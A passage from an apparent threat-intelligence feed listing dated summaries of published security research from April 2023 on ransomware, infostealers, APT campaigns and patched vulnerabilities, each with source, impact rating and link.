- Morphisec researchers have observed the component that makes Aurora’s delivery stealthy and dangerous is a highly evasive loader named “in2al5d p3in4er.” It is compiled with Embarcadero RAD Studio and targets endpoint workstations using advanced anti-VM (virtual machine) techniques.
—
- Intel Source:
- Zscaler
- Intel Name:
- A_New_Backdoor_Called_Devopt
- Date of Scan:
- 2023-04-19
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz researchers have identified a new backdoor called ‘Devopt’. It utilizes hard-coded names for persistence and offers several functionalities, including keylogging, stealing browser credentials, clipper, and more. Multiple versions of the backdoor have surfaced in just the last few days, indicating that it is still in development.
Source:
https://www.zscaler.com/blogs/security-research/introducing-devopt-multifunctional-backdoor-arsenal
—
- Intel Source:
- Microsoft
- Intel Name:
- Attacking_High_Value_Targets_With_Mint_Sandstorm
- Date of Scan:
- 2023-04-19
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have observed a mature subgroup of Mint Sandstorm, an Iranian nation-state actor previously tracked as PHOSPHORUS, refining its tactics, techniques, and procedures (TTPs). Specifically, this subset has rapidly weaponized N-day vulnerabilities in common enterprise applications and conducted highly-targeted phishing campaigns to quickly and successfully access environments of interest.
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Gamaredon_Groups_Automated_Spear_Phishing_Campaigns_Revealed_by_Exposed_Web_Panel
- Date of Scan:
- 2023-04-18
- Impact:
- MEDIUM
- Summary:
- EclecticIQ researchers have identified a spear phishing campaign targeting Ukrainian government entities like the Foreign Intelligence Service of Ukraine (SZRU) and the Security Service of Ukraine (SSU), likely conducted by APT group Gamaredon.
—
- Intel Source:
- Group-IB
- Intel Name:
- Hackers_From_Iran_Leveraging_SimpleHelp_Remote_Support_Software_for_Persistent_Access
- Date of Scan:
- 2023-04-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Group-IB have identified that the Iranian threat actor known as MuddyWater is continuing its time-tested tradition of relying on legitimate remote administration tools to commandeer targeted systems.
Source:
https://www.group-ib.com/blog/muddywater-infrastructure/
—
- Intel Source:
- ASEC
- Intel Name:
- Trigona_Ransomware_Attacking_MS_SQL_Servers
- Date of Scan:
- 2023-04-18
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered the Trigona ransomware being installed on poorly managed MS-SQL servers. Typical attacks involve brute-force and dictionary attacks against systems where account credentials are poorly managed.
—
- Intel Source:
- ASEC
- Intel Name:
- The_Activities_of_Tick_Group
- Date of Scan:
- 2023-04-18
- Impact:
- LOW
- Summary:
- Researchers from ASEC have continued to track Tick group activities as it is targeting government agencies, the military, and various industries in Korea and Japan for over a decade.
—
- Intel Source:
- Securelist
- Intel Name:
- QBot_Banker_Delivering_Via_Business_Correspondence
- Date of Scan:
- 2023-04-18
- Impact:
- LOW
- Summary:
- Securelist researchers have observed a significant increase in attacks that use banking Trojans of the QBot family. The malware is delivered through emails written in different languages, with variants seen in English, German, Italian, and French. The messages were based on real business letters the attackers had gained access to, which allowed them to join the correspondence thread with messages of their own.
Source:
https://securelist.com/qbot-banker-business-correspondence/109535/
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Examination_of_BabLock_Ransomware
- Date of Scan:
- 2023-04-18
- Impact:
- LOW
- Summary:
- TrendMicro researchers have analyzed stealthy and expeditious ransomware called BabLock (aka Rorschach). It has recently been making waves due to its sophisticated and fast-moving attack chain that uses subtle yet effective techniques.
Source:
https://www.trendmicro.com/en_us/research/23/d/an-analysis-of-the-bablock-ransomware.html
—
- Intel Source:
- NTT Security
- Intel Name:
- Fraudulent_Campaign_Using_Fake_Google_Chrome_Error_to_Spread_Malware
- Date of Scan:
- 2023-04-17
- Impact:
- LOW
- Summary:
- Researchers from NTT Security have observed an attack campaign distributing malware from a web page disguised as a Google Chrome error message since around November 2022. Activity increased from around February 2023, and infections have been confirmed across a very wide area, so close attention is required.
—
- Intel Source:
- Uptycs
- Intel Name:
- Zaraza_Bot_Credential_Stealer_Targeting_Browser_Passwords
- Date of Scan:
- 2023-04-17
- Impact:
- LOW
- Summary:
- Researchers from the Uptycs team have identified a new credential-stealing malware, dubbed Zaraza bot (zaraza is the Russian word for infection), which uses Telegram as its command and control channel.
Source:
https://www.uptycs.com/blog/zaraza-bot-credential-password-stealer
—
- Intel Source:
- Fortinet
- Intel Name:
- An_Overview_of_Tax_Scammers
- Date of Scan:
- 2023-04-17
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers have analyzed several examples of malware that take advantage of tax season. Attackers make every attempt to scam taxpayers for financial gain and to exfiltrate data for use in future attacks.
Source:
https://www.fortinet.com/blog/threat-research/tax-scammers-at-large
—
- Intel Source:
- ZScaler
- Intel Name:
- The_Analysis_of_Trigona_Ransomware
- Date of Scan:
- 2023-04-17
- Impact:
- LOW
- Summary:
- Zscaler researchers have analyzed the Trigona ransomware, which is written in Delphi and has been active since at least June 2022.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-trigona-ransomware
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Threat_Actors_From_Conti_and_FIN7_Collaborate_With_Domino_Backdoor
- Date of Scan:
- 2023-04-17
- Impact:
- MEDIUM
- Summary:
- Researchers from IBM Security have discovered a new malware family called Domino, created by developers associated with the cybercriminal group that X-Force tracks as ITG14, also known as FIN7.
Source:
https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/
—
- Intel Source:
- Malware Hunter
- Intel Name:
- LockBit_Encryptor_Targeting_macOS_System
- Date of Scan:
- 2023-04-17
- Impact:
- MEDIUM
- Summary:
- Researchers from MalwareHunterTeam have warned that the LockBit ransomware gang has developed encryptors targeting macOS devices.
Source:
https://twitter.com/malwrhunterteam/status/1647384505550876675
—
- Intel Source:
- Ciberdefensa
- Intel Name:
- Bitter_Group_CHM_malware_distribution
- Date of Scan:
- 2023-04-16
- Impact:
- LOW
- Summary:
- The Bitter group has been distributing CHM malware to certain Chinese organizations through compressed email attachments with filenames such as “Project Plan 2023.chm”. When executed, the CHM files display content related to Chinese and Russian organizations and activate a malicious script that executes additional malware.
—
- Intel Source:
- Yoroi
- Intel Name:
- Money_Ransomware
- Date of Scan:
- 2023-04-16
- Impact:
- LOW
- Summary:
- The article discusses the Money Ransomware group, which utilizes a double extortion model by encrypting data and exfiltrating sensitive information, threatening to publish the data unless a ransom is paid.
Source:
https://yoroi.company/research/money-ransomware-the-latest-double-extortion-group/?&web_view=true
—
- Intel Source:
- Sophos
- Intel Name:
- Malware_Attacks_on_Tax_Firms
- Date of Scan:
- 2023-04-15
- Impact:
- LOW
- Summary:
- Sophos researchers have observed a threat actor targeting financial accounting firms and CPAs with an attack that combines social engineering with a novel exploit against Windows computers to deliver malware called GuLoader.
Source:
https://news.sophos.com/en-us/2023/04/13/tax-firms-targeted-by-precision-malware-attacks/
—
- Intel Source:
- Microsoft
- Intel Name:
- Threat_Actors_Try_to_Wreak_Havoc_on_Tax_Day
- Date of Scan:
- 2023-04-15
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have observed phishing attacks targeting accounting and tax return preparation firms to deliver the Remcos remote access trojan (RAT) and compromise target networks beginning in February of this year.
—
- Intel Source:
- Trellix
- Intel Name:
- The_Activity_of_Emerging_Cybercriminal_Group_Named_Read_The_Manual_RTM_Locker
- Date of Scan:
- 2023-04-15
- Impact:
- LOW
- Summary:
- Researchers from Trellix have detailed the tactics, techniques, and procedures of an emerging cybercriminal gang called ‘Read The Manual’ (RTM) Locker. The group operates a ransomware-as-a-service (RaaS), supplying its malicious code to a network of affiliates under strict rules.
—
- Intel Source:
- ASEC
- Intel Name:
- Bitter_Group_Distributing_CHM_Malware_to_Chinese_Organizations
- Date of Scan:
- 2023-04-14
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified multiple instances of the Bitter group distributing CHM malware to certain Chinese organizations. The files used in the recent attacks arrive as compressed email attachments; each archive contains a CHM file under one of several filenames.
—
- Intel Source:
- CADO
- Intel Name:
- New_Legion_Hacktool_Stealing_Credentials_From_Misconfigured_Sites
- Date of Scan:
- 2023-04-14
- Impact:
- MEDIUM
- Summary:
- Cado Security researchers have identified a new Python-based credential harvester and SMTP hijacking tool named ‘Legion’, sold on Telegram, which targets online email services for phishing and spam attacks.
Source:
https://www.cadosecurity.com/legion-an-aws-credential-harvester-and-smtp-hijacker/
—
- Intel Source:
- CERT-PL
- Intel Name:
- Russian_Hackers_Targeting_NATO_and_EU
- Date of Scan:
- 2023-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers from the Military Counterintelligence Service and the CERT Polska team have observed a widespread espionage campaign linked to Russian intelligence services and targeting NATO and the EU.
Source:
https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services
—
- Intel Source:
- Sentinelone
- Intel Name:
- APT36_Group_Targeting_Indian_Education_Sector
- Date of Scan:
- 2023-04-14
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have identified a cluster of malicious Office documents that distribute Crimson RAT, used by the APT36 group (also known as Transparent Tribe) targeting the education sector.
—
- Intel Source:
- ASEC
- Intel Name:
- Qakbot_Distributing_via_Email_Hijacking
- Date of Scan:
- 2023-04-13
- Impact:
- LOW
- Summary:
- ASEC researchers have identified Qakbot being distributed via malicious PDF files attached to forwards of, or replies to, existing email threads.
—
- Intel Source:
- Esentire
- Intel Name:
- GuLoader_Targeting_the_Financial_Sector_Using_a_Taxthemed_Phishing_Lure
- Date of Scan:
- 2023-04-13
- Impact:
- MEDIUM
- Summary:
- Researchers from eSentire have observed GuLoader targeting the financial sector via phishing emails using a tax-themed lure. The phishing email contains a shared Adobe Acrobat link from which the user downloads a password-protected ZIP archive.
—
- Intel Source:
- Tehtris
- Intel Name:
- Color1337_Cryptojacking_Campaign_Targeting_Linux_Machines
- Date of Scan:
- 2023-04-13
- Impact:
- LOW
- Summary:
- Researchers from Tehtris have identified a cryptojacking campaign, believed to have originated from Romania, and targeting Linux machines. This campaign, dubbed Color1337, leverages a botnet to mine Monero and the botnet can propagate itself to other machines across the network.
Source:
https://tehtris.com/en/blog/linux-focus-on-a-cryptomining-attack-dubbed-color1337
—
- Intel Source:
- Securinfra
- Intel Name:
- Chinese_Hacking_Group_Targeting_European_Governments_and_Businesses
- Date of Scan:
- 2023-04-13
- Impact:
- HIGH
- Summary:
- Researchers from Securinfra have observed that Chinese APT groups are targeting European governments and businesses. Recently, the European Union Agency for Cybersecurity (ENISA) and CERT-EU warned about malicious activities against EU governments and businesses attributed to Chinese Advanced Persistent Threat (APT) groups.
—
- Intel Source:
- Esentire
- Intel Name:
- Raise_in_Qakbot_Malware_Incidents
- Date of Scan:
- 2023-04-13
- Impact:
- LOW
- Summary:
- Researchers from Esentire have observed a significant increase in Qakbot incidents impacting various industries.
Source:
https://www.esentire.com/security-advisories/increase-in-observations-of-qakbot-malware
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_Analyses_April_03rd_April_09th_2023
- Date of Scan:
- 2023-04-13
- Impact:
- LOW
- Summary:
- ASEC's weekly malware statistics show backdoors ranked top with 61.1% of analyzed samples, followed by infostealers with 20.8%, downloaders with 16.9%, and ransomware with 1.1%.
—
- Intel Source:
- Netskope
- Intel Name:
- DigitalOceans_Tech_Support_Scam_Shifts_to_StackPaths_CDN
- Date of Scan:
- 2023-04-13
- Impact:
- MEDIUM
- Summary:
- Netskope researchers have identified that attackers previously abusing DigitalOcean to host a tech support scam have expanded the operation, now abusing StackPath CDN to distribute the scam, and are likely to start abusing additional cloud services to deliver the scam in the near future.
Source:
https://www.netskope.com/pt/blog/tech-support-scam-pivots-from-digitalocean-to-stackpath-cdn
—
- Intel Source:
- Securelist
- Intel Name:
- Attacks_With_Nokoyawa_Ransomware_Using_ZeroDay_Vulnerabilities_in_Windows
- Date of Scan:
- 2023-04-12
- Impact:
- MEDIUM
- Summary:
- Securelist researchers have analyzed CVE-2023-28252, a zero-day elevation-of-privilege vulnerability in the Common Log File System (CLFS) that was exploited in Nokoyawa ransomware attacks.
Source:
https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Recent_Activity_of_IcedID
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Researchers from SANS ISC have observed IcedID (Bokbot) being distributed through thread-hijacked emails with PDF attachments. The PDFs contain links that redirect to Google Firebase Storage URLs hosting password-protected ZIP archives; the password for the downloaded archive is shown in the PDF itself.
—
- Intel Source:
- Sygnia
- Intel Name:
- The_Attack_Flow_of_RagnarLocker_Ransomware
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Researchers from Sygnia have analyzed the attack flow of RagnarLocker ransomware. RagnarLocker is both the name of a ransomware strain and of the criminal group that develops and operates it. Its data leak blog appeared in April 2020, but although the group is experienced, RagnarLocker never made it into the top 10 ransomware strains.
Source:
https://blog.sygnia.co/threat-actor-spotlight-ragnarlocker-ransomware
—
- Intel Source:
- JFrog
- Intel Name:
- Analyzing_Impala_Stealer
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Researchers from JFrog provided a detailed analysis of a malicious payload named “Impala Stealer”, a custom crypto stealer used as the payload of the malicious NuGet packages campaign. The sophisticated campaign targeted .NET developers via malicious NuGet packages, and the JFrog Security team detected and reported it as part of its regular work exposing supply chain attacks.
Source:
https://jfrog.com/blog/impala-stealer-malicious-nuget-package-payload/
—
- Intel Source:
- Securelist
- Intel Name:
- The_Development_and_Refinement_of_DeathNote_Campaign_TTPs
- Date of Scan:
- 2023-04-12
- Impact:
- MEDIUM
- Summary:
- Researchers from Securelist have focused on an active cluster that is dubbed DeathNote because the malware responsible for downloading additional payloads is named Dn.dll or Dn64.dll. This threat is also known as Operation DreamJob or NukeSped.
Source:
https://securelist.com/the-lazarus-group-deathnote-campaign/109490/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_textwrap_wrap_function
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Didier Stevens, SANS ISC senior handler and Microsoft MVP, found that the textwrap.wrap function he used in the diary entry “String Obfuscation: Character Pair Reversal” does not always group characters as he expected. He released an update of his python-per-line.py tool that includes a Reverse function, along with some simple brute-forcing.
Source:
https://isc.sans.edu/diary/Extra+String+Obfuscation+Character+Pair+Reversal/29656
—
- Intel Source:
- Fortinet
- Intel Name:
- Malicious_Document_From_Ukraines_Energoatom_Delivering_Havoc_Demon_Backdoor
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- FortiGuard Labs researchers have identified a malicious spoofed document pretending to be from the Ukrainian company, Energoatom, a state-owned enterprise that operates Ukraine’s nuclear power plants.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_Analysis_of_Malicious_HTA_File
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Researchers from SANS ISC have analyzed a malicious HTA file, continuing an earlier diary entry (part 2 of the analysis).
Source:
https://isc.sans.edu/diary/Another+Malicious+HTA+File+Analysis+Part+2/29676/
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_discovery_of_three_vulnerabilities_in_the_Microsoft_Message_Queuing_service_MSMQ
- Date of Scan:
- 2023-04-12
- Impact:
- HIGH
- Summary:
- Check Point researchers recently discovered three new vulnerabilities in the “Microsoft Message Queuing” service, known as MSMQ. These vulnerabilities were disclosed to Microsoft and patched in the April Patch Tuesday update. The most severe of these, dubbed QueueJumper by CPR (CVE-2023-21554), is a critical vulnerability that could allow unauthenticated attackers to remotely execute arbitrary code in the context of the Windows service process mqsvc.exe.
—
- Intel Source:
- NTT Security
- Intel Name:
- An_attack_campaign_distributing_malware_disguised_as_a_Google_Chrome
- Date of Scan:
- 2023-04-12
- Impact:
- LOW
- Summary:
- Since around November 2022, the NTT Security SOC has been observing an attack campaign distributing malware from a web page disguised as a Google Chrome error screen. It became active from around February 2023, and malware downloads have been confirmed across a very wide range of targets, so caution is warranted. The article provides an overview of the attack campaign and the malware.
Source:
https://insight-jp.nttsecurity.com/post/102ic6o/webgoogle-chrome
—
- Intel Source:
- Securelist
- Intel Name:
- Gopuram_backdoor_deployed_through_3CX_supply_chain_attack
- Date of Scan:
- 2023-04-11
- Impact:
- MEDIUM
- Summary:
- On March 29, CrowdStrike published a report on a supply chain attack conducted via 3CXDesktopApp. Securelist researchers, who had previously observed only a few victims compromised with the Gopuram backdoor, saw the number of infections begin to increase in March 2023; the increase turned out to be directly related to the 3CX supply chain attack.
Source:
https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/
—
- Intel Source:
- Trustwave
- Intel Name:
- A_new_strain_of_malware_Rilide_targets_Chromium_based_browsers
- Date of Scan:
- 2023-04-11
- Impact:
- LOW
- Summary:
- Trustwave SpiderLabs observed a new strain of malware, named Rilide, that targets Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, and Opera. Rilide masquerades as a legitimate Google Drive extension and lets threat actors carry out a wide range of malicious activities, including monitoring browsing history, taking screenshots, and injecting malicious scripts to withdraw funds from various cryptocurrency exchanges.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_CryptoClippy_malware_campaign_targets_Portuguese_speakers
- Date of Scan:
- 2023-04-11
- Impact:
- LOW
- Summary:
- Unit 42 recently observed a malware campaign targeting Portuguese speakers that aims to redirect cryptocurrency from legitimate users’ wallets to wallets controlled by the threat actors. The campaign uses malware known as a cryptocurrency clipper, which monitors the victim’s clipboard for signs that a cryptocurrency wallet address is being copied.
Source:
https://unit42.paloaltonetworks.com/crypto-clipper-targets-portuguese-speakers/
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_analyses_March_26_April_1_2023
- Date of Scan:
- 2023-04-11
- Impact:
- LOW
- Summary:
- ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of phishing email distribution during the week from March 26th, 2023 to April 1st, 2023 and provides statistical information on each type.
—
- Intel Source:
- Checkmarx
- Intel Name:
- Hackers_Flooding_NPM_With_Fake_Packages_Causing_DoS_Attack
- Date of Scan:
- 2023-04-11
- Impact:
- LOW
- Summary:
- Researchers from Checkmarx have identified attackers flooding the npm open source package registry for Node.js with bogus packages, which briefly resulted in a denial-of-service (DoS) condition.
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Deep_Analysis_Report_on_SarinLocker_Ransomware
- Date of Scan:
- 2023-04-11
- Impact:
- LOW
- Summary:
- Cyfirma researchers have deeply analyzed a new ransomware called SarinLocker. The group has started a ransomware affiliate program that provides attackers with ransomware and affiliate software to manage victims.
Source:
https://www.cyfirma.com/outofband/sarinlocker-ransomware/
—
- Intel Source:
- Sucuri
- Intel Name:
- WordPress_Infection_Campaign_Leveraging_Recently_Discovered_Theme_and_Plugin_Vulnerabilities
- Date of Scan:
- 2023-04-10
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have tracked a massive WordPress infection campaign since 2017. They typically refer to it as an ongoing, long-lasting, massive WordPress infection campaign that leverages all known and recently discovered theme and plugin vulnerabilities.
—
- Intel Source:
- Microsoft
- Intel Name:
- Ransomware_Based_Attacks_Carried_Out_by_Iranian_Hackers
- Date of Scan:
- 2023-04-10
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have observed the Iranian nation-state group known as MuddyWater carrying out destructive attacks on hybrid environments under the guise of a ransomware operation.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Ransomware_Group_Named_Money_Message
- Date of Scan:
- 2023-04-10
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new ransomware group named Money Message. It can encrypt network shares and targets both Windows and Linux operating systems.
Source:
https://blog.cyble.com/2023/04/06/demystifying-money-message-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_analyses_March_19_25th_2023
- Date of Scan:
- 2023-04-10
- Impact:
- LOW
- Summary:
- ASEC lab researchers continuously monitor phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post shares the cases of phishing email distribution during the week from March 19th, 2023 to March 25th, 2023 and provides statistical information on each type.
—
- Intel Source:
- Trellix
- Intel Name:
- Royal_Ransom_analyses
- Date of Scan:
- 2023-04-06
- Impact:
- LOW
- Summary:
- The Trellix Advanced Cyber Services team within Trellix Professional Services provided updated incident-response data on the Royal ransomware.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html
—
- Intel Source:
- Trellix
- Intel Name:
- The_functions_of_Genesis_Market
- Date of Scan:
- 2023-04-06
- Impact:
- LOW
- Summary:
- Trellix was approached by law enforcement asking for assistance with the analysis of Genesis Market. Trellix analyzed and explained the functions and operations of Genesis Market, provided an analysis of malware samples that law enforcement shared with them, and offered advice and guidance to (potential) victims.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_statistics_March_27_April_2_2023
- Date of Scan:
- 2023-04-06
- Impact:
- LOW
- Summary:
- ASEC lab researchers continuously monitor malware threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. Their post lists weekly statistics collected from March 27th, 2023 (Monday) to April 2nd, 2023 (Sunday).
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_efile_com_analyses
- Date of Scan:
- 2023-04-06
- Impact:
- LOW
- Summary:
- Johannes B. Ullrich, Ph.D., Dean of Research at SANS.edu, analyzed the efile.com malware “efail”, which was serving malicious fake “Browser Updates” to some of the site's users. He was able to retrieve some of the malware the evening before it was removed. The attack uses two main executables. The first, “update.exe”, is a simple downloader that downloads and executes the second part. The second part is a PHP script that communicates with the command and control server; its main function is to download and execute additional code as instructed. During installation, basic system information is sent to the attacker, and the backdoor is persisted via scheduled/on-boot registry entries.
Source:
https://isc.sans.edu/diary/Analyzing+the+efilecom+Malware+efail/29712/#comments
—
- Intel Source:
- Trustwave
- Intel Name:
- Emotet_Resumed_its_Spamming_Activities
- Date of Scan:
- 2023-04-06
- Impact:
- LOW
- Summary:
- Researchers from Trustwave SpiderLabs have observed Emotet switch to using OneNote attachments, a tactic also adopted by other malware groups in recent months. The analysis is intended to help the cybersecurity community better understand the wider obfuscation and padding tricks Emotet is using.
—
- Intel Source:
- Mandiant
- Intel Name:
- ALPHV_Ransomware_Affiliate_Targeting_Vulnerable_Backup_Installations_to_Gain_Initial_Access
- Date of Scan:
- 2023-04-05
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have observed a new ALPHV (aka BlackCat ransomware) ransomware affiliate, tracked as UNC4466, targeting publicly exposed Veritas Backup Exec installations, vulnerable to CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878, for initial access to victim environments.
Source:
https://www.mandiant.com/resources/blog/alphv-ransomware-backup
—
- Intel Source:
- Symantec
- Intel Name:
- Arid_Viper_Hacking_Group_Using_Upgraded_Malware
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- Researchers from Symantec have observed the threat actor known as Arid Viper using refreshed variants of its malware toolkit in attacks targeting Palestinian entities since September 2022.
—
- Intel Source:
- Cyber War Zone
- Intel Name:
- Disney_Phishing_Scams
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- Researchers from Cyber War Zone have identified the latest Disney-related phishing scams in 2023 and provide tips to protect from falling victim to these scams.
Source:
https://cyberwarzone.com/beware-of-disney-phishing-scams-in-2023/?web_view=true
—
- Intel Source:
- Symantec
- Intel Name:
- An_Attack_Against_Palestinian_Targets_Using_New_Weapons
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- Researchers from Symantec have observed that the Mantis APT group (aka Arid Viper, Desert Falcon, APT-C-23), a threat actor believed to be operating out of the Palestinian territories, is continuing to mount attacks, deploying a refreshed toolset and going to great lengths to maintain a persistent presence on targeted networks.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks
—
- Intel Source:
- Sysdig
- Intel Name:
- Proxyjacking_Scheme_Exploits_Log4j_Bug_to_Profit_From_Victim_IP_Addresses
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- Researchers from Sysdig have detected a new attack, dubbed proxyjacking, that leveraged the Log4j vulnerability for initial access. The attacker then sold the victim’s IP addresses to proxyware services for profit.
Source:
https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
—
- Intel Source:
- Checkpoint
- Intel Name:
- New_Ransomware_Rorschach_Targeting_US_Based_Company
- Date of Scan:
- 2023-04-05
- Impact:
- MEDIUM
- Summary:
- Checkpoint researchers have analyzed the Rorschach ransomware and revealed the emergence of a new ransomware strain in the crimeware landscape. Its developers implemented new anti-analysis and defense evasion techniques to avoid detection and make it more difficult for security software and researchers to analyze and mitigate its effects.
Source:
https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Ransomware_Variants_Are_Dark_Power_and_PayME100USD
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- FortiGuard Labs researchers have identified two new ransomware families named Dark Power and PayMe100USD. Dark Power launched in early February 2023 and is a rare breed in that it was written in the Nim programming language. PayMe100USD, written in Python and discovered in March 2023, has basic functionality and performs ordinary ransomware activities.
Source:
https://www.fortinet.com/blog/threat-research/dark-power-and-payme100usd-ransomware?&web_view=true
—
- Intel Source:
- Mandiant
- Intel Name:
- Chinese_Hacking_Group_RedGolf_Targeting_Windows_and_Linux_Systems
- Date of Scan:
- 2023-04-05
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have identified a Chinese state-sponsored threat activity group, tracked as RedGolf, that has been attributed the use of a custom Windows and Linux backdoor called KEYPLUG.
Source:
https://www.mandiant.com/resources/blog/mobileiron-log4shell-exploitation
—
- Intel Source:
- Talos
- Intel Name:
- Typhon_Reborn_Stealer_Malware_Back_with_Advanced_Evasion_Techniques
- Date of Scan:
- 2023-04-05
- Impact:
- LOW
- Summary:
- Talos researchers have observed that the threat actor behind the information-stealing malware known as Typhon Reborn has resurfaced with an updated version (V2) that packs in improved capabilities to evade detection and resist analysis.
Source:
https://blog.talosintelligence.com/typhon-reborn-v2-features-enhanced-anti-analysis/
—
- Intel Source:
- ASEC
- Intel Name:
- The_distribution_of_Nevada_Ransomware_in_Korea
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- ASEC identified new cases of the Nevada ransomware during internal monitoring. Nevada's defining trait is that it adds the “.NEVADA” extension to the files it encrypts. After encrypting a directory, it drops a ransom note named “README.txt” in that directory; the notes contain a Tor browser link for ransom payment.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Analyzing_Rhadamanthys_infostealer
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- Check Point researchers provided highlights of the Dark Web ‘buzz’ surrounding this malware. They shared insights confirming that, given how the malware is used, large organizations are also subjected to incidental drive-by attacks that have a theoretical potential to escalate. Rhadamanthys is an advanced infostealer which debuted on the dark web in September 2022 to a warm critical reception from cybercriminals.
Source:
https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/
—
- Intel Source:
- Sucuri
- Intel Name:
- Vulnerability_in_WordPress_Elementor_Pro_Patched
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have analyzed the WordPress Elementor Pro vulnerability that allows authenticated users to arbitrarily change wp_options values within the database via the AJAX action of Elementor Pro working in conjunction with WooCommerce.
Source:
https://blog.sucuri.net/2023/03/high-severity-vulnerability-in-wordpress-elementor-pro-patched.html
—
- Intel Source:
- Cyble
- Intel Name:
- The_Malware_Sample_Analysis_of_Cl0p_Ransomware
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- Cyble researchers have analyzed Cl0p ransomware samples; the analyzed sample is an executable with a Graphical User Interface (GUI), compiled using Microsoft Visual C/C++.
Source:
https://blog.cyble.com/2023/04/03/cl0p-ransomware-active-threat-plaguing-businesses-worldwide/
—
- Intel Source:
- MalwareHunter, ISC.SANS
- Intel Name:
- IRS_Authorized_Tax_Return_Filing_Software_Caught_Serving_JS_Malware
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- Researchers from MalwareHunterTeam observed a malicious JavaScript file that existed on the eFile[.]com website for weeks. eFile.com is an IRS-authorized e-file software service provider used by many for filing their tax returns, and it was caught serving JavaScript malware.
—
- Intel Source:
- Cyfirma
- Intel Name:
- New_European_APT_Group_Named_FusionCore
- Date of Scan:
- 2023-04-04
- Impact:
- LOW
- Summary:
- Cyfirma researchers have identified a new European threat actor group known as FusionCore that runs a Malware-as-a-Service operation alongside a hacker-for-hire service. The group offers a wide variety of tools and services on its website, making it a one-stop shop for threat actors looking to purchase cost-effective yet customizable malware.
Source:
https://www.cyfirma.com/outofband/the-rise-of-fusioncore-an-emerging-cybercrime-group-from-europe/
—
- Intel Source:
- DFIR Report
- Intel Name:
- MalSpam_Delivering_Malicious_ISO
- Date of Scan:
- 2023-04-03
- Impact:
- LOW
- Summary:
- The DFIR Report researchers have observed that IcedID continues to be delivered through malspam emails to facilitate a compromise; the report covers activity from a campaign in late September 2022. Post-exploitation activity included some familiar and some new techniques and tooling, which led to domain-wide ransomware.
Source:
https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Cylance_Ransomware_Targeting_Linux_and_Windows
- Date of Scan:
- 2023-04-03
- Impact:
- LOW
- Summary:
- FortiGuard Labs researchers have identified a new ransomware named Cylance that targets both Windows and Linux systems.
—
- Intel Source:
- CERT-UA
- Intel Name:
- ICS_compromised_Due_to_Installation_of_Unlicensed_Microsoft_Office
- Date of Scan:
- 2023-04-03
- Impact:
- MEDIUM
- Summary:
